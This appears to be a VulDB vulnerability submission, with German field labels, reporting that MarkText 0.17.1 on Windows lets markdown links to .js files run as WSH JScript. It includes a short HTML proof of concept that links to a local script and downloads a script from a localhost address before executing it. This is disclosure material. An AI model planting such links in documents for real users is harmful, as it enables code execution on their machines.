| Titel | MarkText on Windows doesn't filter WSH JScript, which may cause code execution |
|---|
| Beschreibung | Although marktext filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.
Version: 0.17.1(latest)
PoC
Local
<a href="poc.js">Click me to execute JScript</a>
Remote
<a href="http://127.0.0.1:8000/poc.html" download="poc.js">1.Click me to download JScript</a>
<a href="./poc.js">2.Click me to execute JScript</a>
For more details, please click the announcement. |
|---|
| Quelle | ⚠️ https://github.com/marktext/marktext/issues/3575 |
|---|
| Benutzer | Tom23 (UID 41413) |
|---|
| Einreichung | 20.02.2023 13:15 (vor 3 Jahren) |
|---|
| Moderieren | 24.02.2023 08:56 (4 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 221737 [MarkText bis 0.17.1 auf Windows WSH JScript erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|